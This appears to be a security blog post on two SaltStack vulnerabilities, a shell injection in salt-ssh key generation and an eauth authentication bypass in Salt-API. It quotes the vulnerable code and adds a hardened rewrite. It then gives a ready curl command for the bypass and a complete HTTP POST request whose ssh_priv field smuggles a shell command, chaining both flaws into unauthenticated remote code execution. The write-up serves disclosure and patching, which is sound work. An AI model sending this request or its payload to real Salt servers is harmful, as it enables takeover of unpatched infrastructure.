Multiple critical vulnerabilities in SaltStack

Published 2020-11-04


On November 3, SaltStack released a Salt security update addressing three critical vulnerabilities. Chaining the unauthenticated authentication bypass with the command injection yields remote code execution (RCE).

CVE-2020-16846

A shell injection in the SSH connection path (salt-ssh) can be abused to execute arbitrary commands through Salt-API.

Vulnerability details

https://github.com/saltstack/salt/blob/v3000/salt/client/ssh/shell.py, line 49:

import os
import subprocess

def gen_key(path):
    '''
    Generate a key for use with salt-ssh
    '''
    # `path` is interpolated into a single command string that is then
    # handed to /bin/sh (shell=True), so shell metacharacters in `path`
    # are interpreted by the shell rather than passed to ssh-keygen.
    cmd = 'ssh-keygen -P "" -f {0} -t rsa -q'.format(path)
    if not os.path.isdir(os.path.dirname(path)):
        os.makedirs(os.path.dirname(path))
    subprocess.call(cmd, shell=True)

The only caller of gen_key is

https://github.com/saltstack/salt/blob/v3000/salt/client/ssh/__init__.py#L261, line 261:

if priv != 'agent-forwarding':
    if not os.path.isfile(priv):
        try:
            salt.client.ssh.shell.gen_key(priv)
        except OSError:

So the command injection is reachable when the SSH object is created, because the private key path (priv) flows straight into gen_key.

See also line 64 of https://github.com/saltstack/salt/blob/v3000/salt/client/ssh/client.py#L64.

For the semantics of call(cmd, shell=True), see https://docs.python.org/2/library/subprocess.html#frequently-used-arguments: with shell=True the string is executed by the system shell, which is exactly why untrusted input in the command string is dangerous.
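As an added illustration (not Salt's own code or its official fix), the following places the vulnerable string-building pattern from shell.py beside a hardened replacement that passes an argument vector with no shell and validates the key path before it is used; the `run` parameter, the `SAFE_PATH` allowlist and the sample paths are assumptions of this example.

```python
import os
import re
import subprocess

# Vulnerable pattern (mirrors the quoted gen_key): the path becomes part of a
# string that /bin/sh parses, so metacharacters in it are shell syntax.
def build_vulnerable_cmd(path):
    return 'ssh-keygen -P "" -f {0} -t rsa -q'.format(path)

# Hardened form: an allowlist for key paths (assumed policy for this example)
# plus an argv list, so the path reaches ssh-keygen as one literal argument.
SAFE_PATH = re.compile(r'^[A-Za-z0-9_./-]+$')

def build_safe_argv(path):
    if not SAFE_PATH.match(path) or '..' in path.split('/'):
        raise ValueError('refusing suspicious key path: %r' % (path,))
    return ['ssh-keygen', '-P', '', '-f', path, '-t', 'rsa', '-q']

def is_rejected(path):
    """True if the hardened builder refuses this path."""
    try:
        build_safe_argv(path)
    except ValueError:
        return True
    return False

def gen_key(path, run=subprocess.call):
    """Hardened gen_key: validate, create the parent dir, exec without a shell.

    `run` defaults to subprocess.call; tests inject a recorder instead so the
    example does not need ssh-keygen installed.
    """
    argv = build_safe_argv(path)
    parent = os.path.dirname(path)
    if parent and not os.path.isdir(parent):
        os.makedirs(parent)
    # No shell=True: argv goes to execve verbatim, nothing is re-parsed.
    return run(argv)

if __name__ == '__main__':
    # Constructed inputs: a normal key path and one carrying shell syntax.
    for p in ['/etc/salt/pki/master/ssh/salt-ssh.rsa', 'key|id>/tmp/out']:
        print(p, 'rejected' if is_rejected(p) else 'accepted')
```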

CVE-2020-25592

Salt has an authentication bypass in the validation of eauth credentials and access control lists (ACLs): Salt-netapi does not properly validate eauth credentials and tokens.

Vulnerability details

See the two links shared by a more experienced researcher:

https://github.com/saltstack/salt/commit/daa39c58370641913aa8d5a7a0f44254973dd66b#diff-6d5cc913690a33d019c14883b0d43cf49166660822d8de8264f0352f40df473a

https://github.com/saltstack/salt/commit/daa39c58370641913aa8d5a7a0f44254973dd66b#diff-321216b82b52dc7fbe81d57d907cdafb190af0df6f273eea4879450da8c48293R467-R478

The links already make it clear: the authentication check can be bypassed.

curl -sSk https://ip:8000/run  -H "Accept: application/x-yaml" -d roster=cache -d fun=xx -d client=ssh -d tgt=localhost  -d eauth=xx

One pitfall here: tgt=localhost works as is, but if you want to use 127.0.0.1 it must be quoted.

RCE

Exploit code:

POST /run HTTP/1.1
Host: ip:8000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Accept: application/x-yaml
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079

client=ssh&tgt=localhost&fun=xx&eauth=xx&ssh_priv=ki9mu|id>/tmp/ki9mu

References:

https://github.com/saltstack/salt/commit/daa39c58370641913aa8d5a7a0f44254973dd66b#diff-6d5cc913690a33d019c14883b0d43cf49166660822d8de8264f0352f40df473a

https://github.com/saltstack/salt/commit/daa39c58370641913aa8d5a7a0f44254973dd66b#diff-321216b82b52dc7fbe81d57d907cdafb190af0df6f273eea4879450da8c48293R467-R478
